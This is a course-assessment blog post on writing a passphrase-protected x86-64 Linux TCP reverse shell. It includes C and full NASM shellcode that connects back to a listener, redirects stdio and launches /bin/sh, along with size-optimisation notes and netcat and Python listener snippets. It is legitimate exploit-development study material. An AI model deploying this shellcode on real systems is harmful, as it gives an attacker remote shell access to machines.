Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Security Tube SLAE64 Course - Assessment 2 - TCP Reverse Shell
Posted: 27 Oct 2017 at 13:46 by Codehead

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This write up is for the second assignment: Create a shellcode string that will start a TCP Reverse Shell.

A reverse shell connects to a remote host on a given network address and port. Any commands issued by the remote host are relayed to a local shell on the target in the same way as the bind shell.


Having the target reach out to the remote machine may seem like an odd way of making the connection, especially as the remote must be ready and listening for the connection to be successful. However, this type of connection is preferable if the target is behind a firewall or a network address translation (NAT) layer which would make an inbound connection to a bind shell difficult.

As with the bind shell, a passphrase must be implemented to add a layer of security to the program.

High Level Proof of Concept

Again, Vivek provided a rough outline of the code in C during the course and this was taken as a base for this assignment.

The full listing of my version of the code is hosted on GitHub: Reverse_Shell.c.

As the code for the bind shell was covered in detail in the first assignment, I won’t go into another line by line breakdown. However, it is worth looking at the parts which have changed.

Socket parameters

We’re connecting out to a remote machine, so the sockaddr_in structure has a specific address entry this time.

server.sin_family = AF_INET;    // 2
server.sin_port = htons(4444);  // 0x5c11
server.sin_addr.s_addr = inet_addr("127.0.0.1");  // 0x7f000001
bzero(&server.sin_zero, 8);

We’re using the loopback address to keep things simple for this example. To insert an arbitrary address we can use Python to look up the hex conversion. The Python socket module does not have an inet_addr() function to convert an address string, but the inet_aton() function works in a similar way:

MBP:slae64$ python
Python 2.7.12 (default, Jun 29 2016, 14:05:02)
Type "help", "copyright", "credits" or "license" for more information.
>>> import socket
>>> socket.inet_aton("")

Remember that the converted value is still a string and will need to be reversed when building the sockaddr_in structure in memory.
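
As a rough illustration, the conversion and the reversal can be sketched in Python 3, where inet_aton() returns a bytes object rather than a str. The helper name addr_to_hex and the 192.168.1.10 address are assumptions for the example, not part of the assignment code.

```python
import socket

def addr_to_hex(address):
    """Return (network-order hex, byte-reversed hex) for a dotted-quad IPv4 address."""
    packed = socket.inet_aton(address)   # 4 bytes in network byte order
    return packed.hex(), packed[::-1].hex()

# Loopback, as used in this post: ('7f000001', '0100007f')
print(addr_to_hex("127.0.0.1"))
# An assumed example of an arbitrary address
print(addr_to_hex("192.168.1.10"))
```

The second value of each pair is the form needed when the address is loaded into a register as a little-endian immediate.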

Connecting the socket

There is no bind step required for a client socket; we simply reach out to the remote host:

// Connect to remote host       
if((connect(sock, (struct sockaddr *)&server, sockaddr_len)) == -1)
    perror("connect: ");

There is no retry logic on a client socket. If the target socket is not up, running and able to accept the connection, the connect call fails with a ‘Connection Refused’ error.

Validating the user

The validation loop was removed for this program. If an invalid password is returned from the prompt, the connection is dropped and the program exits. Depending on how the remote server is running, the remote socket will probably also be closed in response to the disconnect. There would be little point in immediately retrying the connection.

// Check password
send(sock, (char*)"Anyone there?\n", 14, 0);
read(sock, &in, 10);

if(strncmp("BigSecret", in, 9))
    send(sock, (char*)"Nope\n", 5, 0);

Assuming the password is entered correctly, the rest of the code is much the same as the bind shell. I/O streams are duplicated and a new shell instance is spawned.

Testing the code

We can set up a listening socket using netcat:

codehead@ubuntu:assignment_2$ nc -l 4444

Running the reverse shell code from another terminal, we should see the prompt appear in the netcat process:

codehead@ubuntu:assignment_2$ nc -l 4444
Anyone there?

Remember to start the netcat listener before running the reverse shell.

Converting the code to Assembler

We can re-use a good deal of the Bind_Shell.nasm code to create the reverse shell. However, this time I am making an extra effort to reduce the code size as much as possible.

Storage Requirements

We will use the stack to store variables again. This time we only need to store one fixed value; the socket ID.


The buffers remain the same, even though we only have one sockaddr_in struct this time.

Setting up

We’ll use the jump, call, pop method to locate the string data within our code:

    mov rbp, rsp
    jmp short _strdata  ; Find address of string list
_getref:
    pop r15             ; RIP address is the start of string data
    jmp short _main

_strdata:
    call _getref        ; Push RIP onto stack
    prompt: db "?", 0xa
    pass:   db "BigSecret"
    good:   db "OK", 0xa

The strings are pretty minimal to reduce the size of the shellcode. In the last assignment, I sacrificed the strings to save space. In the reverse shell, some kind of indication is needed to show an operator that the target has made the connection to the host, so I’m leaving some of the bells and whistles in.
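
Because the three strings are stored back to back with no terminators, each one is later addressed as an offset from r15. A small Python sketch (the helper name string_offsets is hypothetical) shows where the [r15+2] and [r15+11] offsets used further down come from:

```python
# String table in the order it is declared after the call instruction.
STRINGS = [("prompt", b"?\n"), ("pass", b"BigSecret"), ("good", b"OK\n")]

def string_offsets(table):
    """Map each label to (offset from r15, length in bytes)."""
    offsets, position = {}, 0
    for label, data in table:
        offsets[label] = (position, len(data))
        position += len(data)
    return offsets

for label, (offset, length) in string_offsets(STRINGS).items():
    print(f"{label}: [r15+{offset}], {length} bytes")
```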

We include the _prompt and _exit utility methods again. This time they are optimised to reduce size.

_prompt:                ; send string to a socket, RSI and RDX populated before call    
    pop rdi
    push rdi            ; socket id
    xor rax, rax    
    mov r10, rax        ; Zero unused params
    mov r8, rax
    mov r9, rax 
    add al, 44          ; sys_sendto
    syscall
    ret

_exit:                  ; exit nicely
    xor rax, rax
    push rax
    pop rbx
    add al, 0x3c
    inc ebx
    mov rsp, rbp
    syscall

Intermission: Optimising instruction counts

While trying to reduce the size of the shellcode I discovered quite a few odd things about x64 assembler.

Adding (or subtracting) small values using the RAX or AX registers is a 4 byte instruction. Using AL cuts that in half.

48 83 c0 10        add rax,0x10     
83 c0 10           add eax,0x10 
66 83 c0 10        add ax, 0x10 
80 c4 10           add ah, 0x10     
04 10              add al, 0x10     

Unfortunately, the same cannot be said for the RBX, RCX and RDX registers, although we can still save a byte by favouring the 32 bit extended register.

48 83 eb 10        sub rbx,0x10                 
83 eb 10           sub ebx,0x10                 
66 83 eb 10        sub bx, 0x10                  
80 ef 10           sub bh, 0x10                  
80 eb 10           sub bl, 0x10                  

Index registers don’t have high byte access, but the extended register is still clearly the best option.

48 83 c6 10        add rsi,0x10             
83 c6 10           add esi,0x10             
66 83 c6 10        add si, 0x10       
40 80 c6 10        add sil,0x10       

Increment and decrement operations are also best used on the 32 bit registers. They are no longer than the 8 bit forms and carry through the full 32 bits instead of wrapping within a single byte. This applies to most registers.

48 ff c0           inc rax                
ff c0              inc eax                
66 ff c0           inc ax                 
fe c0              inc al                 
fe c4              inc ah 

ff cb              dec ebx
ff c9              dec ecx
ff ce              dec esi
ff cf              dec edi

Accessing the extra x64 registers is quite verbose and nowhere near as efficient:

49 83 c1 10        add r9,0x10 
41 83 c1 10        add r9d,0x10
66 41 83 c1 10     add r9w,0x10
41 80 c1 10        add r9b,0x10
41 fe c1           inc r9b      

When moving data around, using the stack is often preferable to a simple MOV instruction.

48 89 c3           mov rbx,rax                
50                 push rax                    
5b                 pop  rbx                      

A MOV operation is 3 bytes, using PUSH/POP is just 2.

In fact, it is often shorter to PUSH an immediate value onto the stack and then POP it into the required register than to do an XOR and ADD.

48 31 c0           xor    rax,rax
04 10              add    al,0x10

6a 10              push   0x10
58                 pop    rax

Of course, the x64 registers throw a spanner in the works by requiring two bytes for PUSH/POP:

41 51              push r9
41 52              push r10
41 5e              pop  r14
41 5f              pop  r15   

These optimisations are small, but when applied over the whole program they can make a big difference. There is no ‘one size fits all rule’ for reducing the code size, but by selecting the best approach based on the required outcome or re-ordering the operations to make best use of resources, good savings can be made.
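
To make the comparison concrete, here is a small Python sketch that totals the byte counts for a few of the alternatives above. The encodings are copied from the listings in this section; the ENCODINGS table and the size helper are only illustrative names.

```python
# Encodings copied from the listings above.
ENCODINGS = {
    "mov rbx,rax": "48 89 c3",
    "push rax": "50",
    "pop rbx": "5b",
    "xor rax,rax": "48 31 c0",
    "add al,0x10": "04 10",
    "push 0x10": "6a 10",
    "pop rax": "58",
}

def size(*instructions):
    """Total encoded length, in bytes, of a sequence of instructions."""
    return sum(len(bytes.fromhex(ENCODINGS[i])) for i in instructions)

print("mov rbx,rax          :", size("mov rbx,rax"))
print("push rax / pop rbx   :", size("push rax", "pop rbx"))
print("xor rax / add al     :", size("xor rax,rax", "add al,0x10"))
print("push 0x10 / pop rax  :", size("push 0x10", "pop rax"))
```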

Creating the socket

Getting back to the code, we’ll create and configure the socket in the same way as last time. However, this time we need to populate the address field, remembering to build the in-memory string in reverse.

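The layout we’re going for is the sockaddr_in structure as it sits in memory: 02 00 (sin_family), 11 5c (sin_port), 7f 00 00 01 (sin_addr), followed by eight zero bytes of sin_zero.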


Some careful optimisation with INC and PUSH/POP instructions really helps reduce the byte count here. However, readability is sacrificed.

_main:
; Build a server sockaddr_in struct on the stack
    xor rax, rax
    push rax            ; sin_zero
    inc eax             ; start the address
    shl eax, 24         ; pad with three zeros
    add al, 0x7f        ; overwrite the last zero with 0x7f / 127
    shl rax, 16
    add ax, 0x5c11      ; htons(4444)
    shl rax, 16
    add al, 2           ; sin_family
    push rax
; Create Socket 
    xor rdi, rdi
    push rdi
    push rdi
    pop rax
    pop rdx
    inc edi
    push rdi
    pop rsi             ; SOCK_STREAM (1)
    inc edi             ; AF_INET (2)
    add al, 41          ; syscall 41
    syscall
    cmp rax, -1
    jle short _exit
    push rax            ; store socket id on stack
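
The shift and add sequence is hard to follow by eye, so here is a Python sketch that emulates it and compares the result with the structure bytes built the conventional way. The helper names add_low and build_rax are hypothetical, and AF_INET is assumed to be 2, as in the C listing.

```python
import socket
import struct

MASK64 = 0xFFFFFFFFFFFFFFFF

def add_low(value, imm, bits):
    """Add imm to the low `bits` of value, wrapping like add al / add ax."""
    mask = (1 << bits) - 1
    return (value & ~mask) | ((value + imm) & mask)

def build_rax():
    rax = 0                              # xor rax, rax
    rax = (rax + 1) & 0xFFFFFFFF         # inc eax
    rax = (rax << 24) & 0xFFFFFFFF       # shl eax, 24
    rax = add_low(rax, 0x7F, 8)          # add al, 0x7f
    rax = (rax << 16) & MASK64           # shl rax, 16
    rax = add_low(rax, 0x5C11, 16)       # add ax, 0x5c11
    rax = (rax << 16) & MASK64           # shl rax, 16
    rax = add_low(rax, 2, 8)             # add al, 2
    return rax

# What push rax leaves in memory (little-endian) ...
pushed = struct.pack("<Q", build_rax())
# ... versus family, port and address packed field by field.
expected = struct.pack("<H", 2) + struct.pack(">H", 4444) + socket.inet_aton("127.0.0.1")
print(hex(build_rax()), pushed.hex(), pushed == expected)
```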

Connecting to the remote host

The connect syscall matches the C function:

ID / RAX   Name          Arg1 / RDI   Arg2 / RSI                   Arg3 / RDX
42         sys_connect   int fd       struct sockaddr *uservaddr   int addrlen

Because we know that the socket ID is the top value on the stack, we can use the POP/PUSH trick to load a register in two bytes rather than the 4 required for a mov rdi,[rbp-24] with its stack offset calculation. We also use the PUSH/POP absolute assign method to save a few extra bytes here when defining the constants.

; Connect to remote host
    pop rdi
    push rdi            ; socket id
    lea rsi, [rbp-16]   ; sockaddr struct
    push 16
    pop rdx             ; struct size
    push 42
    pop rax             ; sys_connect
    syscall
    cmp eax, -1
    jle short _exit

Assuming the return in RAX (I’m actually using CMP EAX to save a byte) is greater than -1, we have a connection to the remote host and can move on to the authentication.


As previously stated, a visual prompt is required to let an operator on the listening host know that an incoming connection has been made. If the listening socket was under the control of some code rather than netcat, we could trigger actions on connect, but for the purpose of this exercise we need to send a ‘Hello’ message.

The shortest thing I could come up with that still conveyed a request for input was a question mark. So, the prompt for a password is just that: a question mark followed by a newline. We know from our earlier jump, call, pop code that the strings start at the address pointed to by r15. We also provide the length of the string. The _prompt function does the rest.

; Send message
    mov rsi, r15        ; string address
    push 2
    pop rdx             ; string length
    call _prompt 
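
On the listening side, the prompt could be handled by code rather than netcat. The following Python sketch is one possible shape for that, not part of the assignment: the function names answer_prompt and listen_once are hypothetical, and the port and passphrase are the ones used in this post.

```python
import socket

def answer_prompt(conn, passphrase=b"BigSecret"):
    """Wait for the prompt from the reverse shell, then send the passphrase."""
    prompt = conn.recv(64)       # the "?" plus newline sent by the target
    conn.sendall(passphrase)     # the 9 bytes the target compares against
    return prompt

def listen_once(port=4444, host="0.0.0.0"):
    """Accept a single incoming connection and answer its prompt."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        print("connection from", peer)
        print("prompt:", answer_prompt(conn))
        return conn              # caller drives the shell from here
```

Calling listen_once() before starting the reverse shell would take the place of the nc -l 4444 step.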

We don’t need the sockaddr_in data any more, so we are free to overwrite buffer 1 with the input received from the remote host. The socket ID is still top of the stack, so we can use the POP/PUSH trick again.

; Listen for response
    pop rdi
    push rdi            ; socket id
    lea rsi, [rbp-16]   ; buffer address
    xor rax, rax        ; Zero out registers
    push rax
    pop r10
    mov r8, rax
    mov r9, rax 
    push 9
    pop rdx             ; buffer length
    add al, 45          ; recvfrom
    syscall

We covered string checks with CMPSB in the last assessment, so there is no need to dissect this. However, a small optimisation worth pointing out is the _exit handler. In the event of a mismatch, we need to stop the program. The _exit function back at the start of the code is beyond the 127 byte reach of a short jump, meaning we end up with a bloated 6 byte relative jump. To get around this, an extra location named _end was added before the final _exit call at the end of the code. This is within 127 bytes and reduces a 6 byte relative jump to a 2 byte short jump.

; Check for correct pass phrase
    lea rsi, [rbp-16]   ; input buffer address
    lea rdi, [r15+2]    ; password string address
    push 9
    pop rcx             ; length
_cmploop:
    cmpsb               ; compare bytes
    jne short _end      ; exit if no match
    loop _cmploop       ; next char 

Using the short keyword forces the assembler to use the 2 byte jump instruction, and it will report an error when such a jump is out of range. It can be annoying to put the extra work in to manage these jumps, but it is well worth it to save 4 bytes.
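
The size difference comes from the displacement field: a short jump carries a signed 8 bit offset, while the near forms carry a 32 bit one. A simplified Python sketch of that rule follows. The helper name jump_size is hypothetical, and the displacement is taken as already measured from the end of the jump instruction.

```python
SHORT_MIN, SHORT_MAX = -128, 127    # range of a signed 8 bit displacement

def jump_size(displacement, conditional=True):
    """Bytes needed to encode a jump with the given relative displacement."""
    if SHORT_MIN <= displacement <= SHORT_MAX:
        return 2                        # one opcode byte + rel8
    return 6 if conditional else 5      # 0f 8x + rel32, or e9 + rel32

print(jump_size(100))                       # within short range
print(jump_size(-200))                      # conditional near jump
print(jump_size(-200, conditional=False))   # unconditional near jump
```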

Assuming the password is validated, all that is left to do is set up the shell as before. These methods have been optimised for size, but the functionality is identical.

; good passphrase (fallthrough)
    lea rsi, [r15+11]   ; OK string
    push 3
    pop rdx             ; welcome length
    call _prompt

; Duplicate I/O descriptors
    xor rax, rax    
    pop rdi
    push rdi            ; socket id
    push rax
    pop rsi             ; 0 = STDIN
    add al, 33          ; dup2  
    push rax            ; keep syscall id
    syscall
    pop rax             ; dup2
    push rax
    inc esi             ; 1 = STDOUT
    syscall
    pop rax             ; dup2
    inc esi             ; 2 = STDERR
    syscall
; spawn a shell
    xor rax, rax
    push rax
    pop rdx        
    mov rbx, 0x68732f6e69622f78 ; build x/bin/sh
    shr rbx, 8          ; shift out the "x" and append a NULL
    mov [rbp-16], rbx   ; copy "/bin/sh" string to buffer
    lea rdi, [rbp-16]   ; get the /bin/sh string
    push rax            ; build args array, by pushing NULL
    push rdi            ; then pushing string address
    mov rsi, rsp        ; args array address
    add al, 59          ; execve
    syscall
_end:
    call _exit

Note the _end label between the execve syscall and the final call to _exit.
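
The shift used to build the /bin/sh string without a literal null byte can be checked with a short Python sketch (the helper name shifted_string is hypothetical):

```python
import struct

def shifted_string(value, shift_bytes=1):
    """Bytes held in memory after shr by whole bytes and a 64 bit store."""
    return struct.pack("<Q", value >> (8 * shift_bytes))

print(struct.pack("<Q", 0x68732F6E69622F78))   # before the shift
print(shifted_string(0x68732F6E69622F78))      # after shr rbx, 8
```

The padding byte is shifted out of the low end and a zero is shifted in at the high end, which lands at the end of the string once the register is stored in little-endian order.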

Shellcode conversion and testing

As with the bind shell, this code contains inline string data which confuses the Commandline Fu shellcode extractor. So the raw hex was extracted with my Hexdump script.

The resulting shellcode comes in at 256 bytes which is pretty good. Even with the strings and error checking left in, it is smaller than the cut down version of the reverse shell. No pesky null bytes either.
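
Null bytes matter because shellcode is often delivered through string handling code that stops at the first zero byte. A quick Python sketch for checking a byte string is shown below. The helper name null_offsets is hypothetical, and the two fragments are short illustrations rather than the assignment's shellcode.

```python
def null_offsets(shellcode):
    """Return the offsets of any zero bytes in the shellcode."""
    return [i for i, b in enumerate(shellcode) if b == 0]

safe = bytes.fromhex("48 31 c0 04 10")     # xor rax,rax / add al,0x10
unsafe = bytes.fromhex("b8 10 00 00 00")   # mov eax,0x10

print(null_offsets(safe))     # no zero bytes
print(null_offsets(unsafe))   # zero bytes from the 32 bit immediate
```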


Running the shellcode under Vivek’s Shellcode Wrapper, we see that the required functionality is present and working correctly:

codehead@ubuntu:assignment_2$ nc -l 4444

That completes this assessment. While the code was not ground breaking, working on the optimisation of shellcode size was a useful and interesting exercise.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE64-1471

Categories: SLAE64 Assembler Shellcode
